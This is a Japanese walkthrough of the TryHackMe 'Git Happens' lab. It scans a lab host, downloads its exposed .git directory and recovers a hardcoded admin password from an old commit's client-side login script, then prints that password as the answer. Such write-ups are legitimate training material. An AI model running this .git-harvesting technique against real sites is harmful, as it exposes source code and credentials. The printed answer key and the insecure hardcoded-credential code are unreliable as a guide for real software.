概要
TryHackMe「Git Happens」のWalkthroughです。
Task1
Q1.Find the Super Secret Password
ポートスキャンを実行します。
$ nmap -Pn -T4 -sVC -A -p- 10.10.100.139 -oN nmap_result
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-git:
| 10.10.100.139:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
ディレクトリスキャンをします。
$ dirsearch -u http://10.10.100.139
[05:45:30] 200 - 1KB - /.git/
[05:45:30] 200 - 179B - /.git/branches/
[05:45:30] 200 - 110B - /.git/config
[05:45:30] 200 - 73B - /.git/description
[05:45:30] 200 - 23B - /.git/HEAD
[05:45:30] 200 - 1KB - /.git/hooks/
[05:45:30] 200 - 645B - /.git/index
[05:45:30] 200 - 283B - /.git/info/
[05:45:30] 200 - 240B - /.git/info/exclude
[05:45:30] 200 - 390B - /.git/logs/
[05:45:30] 301 - 194B - /.git/logs/refs -> http://10.10.100.139/.git/logs/refs/
[05:45:30] 200 - 216B - /.git/logs/HEAD
[05:45:30] 301 - 194B - /.git/logs/refs/heads -> http://10.10.100.139/.git/logs/refs/heads/
[05:45:30] 200 - 216B - /.git/logs/refs/heads/master
[05:45:30] 301 - 194B - /.git/logs/refs/remotes -> http://10.10.100.139/.git/logs/refs/remotes/
[05:45:30] 200 - 4KB - /.git/objects/
[05:45:31] 200 - 102B - /.git/packed-refs
[05:45:31] 200 - 505B - /.git/refs/
[05:45:31] 301 - 194B - /.git/refs/heads -> http://10.10.100.139/.git/refs/heads/
[05:45:31] 301 - 194B - /.git/refs/remotes -> http://10.10.100.139/.git/refs/remotes/
[05:45:31] 200 - 41B - /.git/refs/heads/master
[05:45:31] 301 - 194B - /.git/refs/tags -> http://10.10.100.139/.git/refs/tags/
[05:45:31] 200 - 792B - /.gitlab-ci.yml
[05:46:18] 301 - 194B - /css -> http://10.10.100.139/css/
[05:46:19] 200 - 4KB - /dashboard.html
[05:47:01] 200 - 54B - /README.md
/.gitパスからはgit関連のファイルを確認できました。
ルートディレクトリにはログインフォームがあります。
/.git配下をすべてダウンロードします。
$ wget -r http://10.10.100.139/.git/
複数のコミット履歴を確認できました。
$ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Thu Jul 23 22:22:16 2020 +0000
Update .gitlab-ci.yml
commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:21:25 2020 +0200
add gitlab-ci config to build docker file.
commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:08:38 2020 +0200
setup dockerfile and setup defaults.
commit d6df4000639981d032f628af2b4d03b8eff31213
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:42:30 2020 +0200
Make sure the css is standard-ish!
commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:41:12 2020 +0200
re-obfuscating the code to be really secure!
commit bc8054d9d95854d278359a432b6d97c27e24061d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:37:32 2020 +0200
Security says obfuscation isn't enough.
They want me to use something called 'SHA-512'
commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:25:52 2020 +0200
Obfuscated the source code.
Hopefully security will be happy!
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Mon Jul 20 20:46:28 2020 +0000
Initial commit
順にコミット内容を確認していくとソースコードから認証情報を得られました。
$ git show 395e087334d613d5e423cdf8f7be27196a360459
(省略)
+ <script>
+ function login() {
+ let form = document.getElementById("login-form");
+ console.log(form.elements);
+ let username = form.elements["username"].value;
+ let password = form.elements["password"].value;
+ if (
+ username === "admin" &&
+ password === "Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!"
+ ) {
+ document.cookie = "login=1";
+ window.location.href = "/dashboard.html";
+ } else {
+ document.getElementById("error").innerHTML =
+ "INVALID USERNAME OR PASSWORD!";
+ }
+ }
+ </script>
A.Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!